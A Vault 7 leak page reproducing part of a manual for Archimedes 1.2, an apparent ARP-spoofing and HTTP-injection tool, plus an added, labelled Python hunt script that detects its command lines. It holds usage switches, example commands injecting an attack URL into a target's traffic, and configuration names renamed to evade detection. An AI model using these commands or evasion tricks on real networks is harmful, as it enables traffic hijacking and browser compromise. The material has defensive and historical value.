Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//NOFORN
(U) NEW FEATURES
(S) IMPROVED ARGUMENT PARSING
(S//NF) As more options have been introduced, the original parameter parsing approach which relied on the
argument order has become difficult to use. Archimedes 1.2 modifies the tool to require parameter switches in
command lines passed to the EXE and DLL builds. This simplifies the argument specification by reducing the
number of parameters required and eliminating the dependency on argument ordering.
ARCHIMEDES 1.2 USAGE
REQUIRED
-t [Target MAC Address]
-g [Gateway MAC Address]
OPTIONAL
-u [Injected URL, required except for SURVEY_ONLY (SO) method, No default]
-d [MILLISECONDS_BETWEEN_SPOOFS, Optional, Default: 1000]
-v [VERIFY_ROUTE (TRUE/FALSE), Optional, Default: FALSE]
-m [INJECTION_METHOD, Optional, Default: SO]
-p [PORT for HTTP monitoring, Optional, Default: 80]
-w [HOST_WHITELIST Optional, Default: (empty)]
Example:
1) f32.exe -t 00:0C:29:BD:34:45 -g 00:0c:29:61:d0:d7 -m SO
2) f32.exe -t 00:0C:29:BD:34:45 -g00:0c:29:61:d0:d7 -u http://10.0.0.11/attack.html -v FALSE -m HI -w www.mytest.com,mytest.com,www.yahoo.com
(S//NF) Spaces between the switch and the argument are optional. Please see the “APPLICATION DEFAULTS”
section below for information on the default values of each configuration value. Note that the injected URL value
is required, except for SURVEY_ONLY (SO) mode.
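
Added example (not part of the original document or the tool's code): a defender-side hunt that parses process command lines for the switch syntax described above, treating the space after a switch as optional, and flags any that pass MAC-shaped values to both -t and -g. The event list and host names are constructed; the first two command lines are the examples shown above.

```python
import re

# Switch letters listed in the Archimedes 1.2 usage text on this page.
# A value may follow its switch with or without a space, and never starts with '-'.
SWITCH_RE = re.compile(r"(?:^|\s)-([tgudvmpw])\s*(?!-)(\S+)")
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")


def parse_switches(cmdline):
    """Return {switch: value} for every recognised switch in a command line."""
    return {m.group(1): m.group(2) for m in SWITCH_RE.finditer(cmdline)}


def matches_usage(cmdline):
    """True when both required switches (-t, -g) carry MAC-shaped values."""
    sw = parse_switches(cmdline)
    return all(MAC_RE.match(sw.get(k, "")) for k in ("t", "g"))


def hunt(events):
    """Yield (host, parsed switches) for process events that match."""
    for host, cmdline in events:
        if matches_usage(cmdline):
            yield host, parse_switches(cmdline)


# Constructed process-creation events (host, command line). The first two
# command lines are the page's own examples; hosts and the rest are made up.
EVENTS = [
    ("ws-01", "f32.exe -t 00:0C:29:BD:34:45 -g 00:0c:29:61:d0:d7 -m SO"),
    ("ws-02", "f32.exe -t 00:0C:29:BD:34:45 -g00:0c:29:61:d0:d7 "
              "-u http://10.0.0.11/attack.html -v FALSE -m HI "
              "-w www.mytest.com,mytest.com,www.yahoo.com"),
    ("ws-03", "ping.exe -t 10.0.0.1"),                # -t without a MAC
    ("ws-04", "tar.exe -t -g snapshot.snar -v"),      # same letters, other tool
    ("ws-05", "svc.exe -g 00:0c:29:61:d0:d7 -t00:0C:29:BD:34:45"),  # renamed, reordered
]

if __name__ == "__main__":
    for host, sw in hunt(EVENTS):
        print(host, sw)
```

The match keys on argument shape rather than the executable name or switch order, so it still fires on the renamed, reordered command line in the last constructed event.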
(U) RENAMED CONFIGURATION ITEMS
(S//NF) The following names used in the encrypted configuration file have been changed to avoid having “alerting”
strings on the target:
OLD NAME                      NEW NAME   DESCRIPTION
VICTIM_MAC                    VM         Target’s MAC address
HIJACKED_MAC                  HM         MAC address of the gateway (hijacked address)
MILLISECONDS_BETWEEN_SPOOFS   MS         Time between ARP spoofs
INJECTED_URL                  IU         URL that will be injected
INJECTION_METHOD              IM         HTML methods used to inject the URL
USABLE_MEDIA_TYPES            UM         HTML content type to inject against
USER_AGENT_WHITELIST          UW         Only attack these agents
USER_AGENT_BLACKLIST          UB         Don’t attack these agents
VERIFY_ROUTE                  VR         Send verification packet before attack
PORT                          PT         Port to monitor for HTTP traffic
HOST_WHITELIST                HW         List of hosts that can be injected into
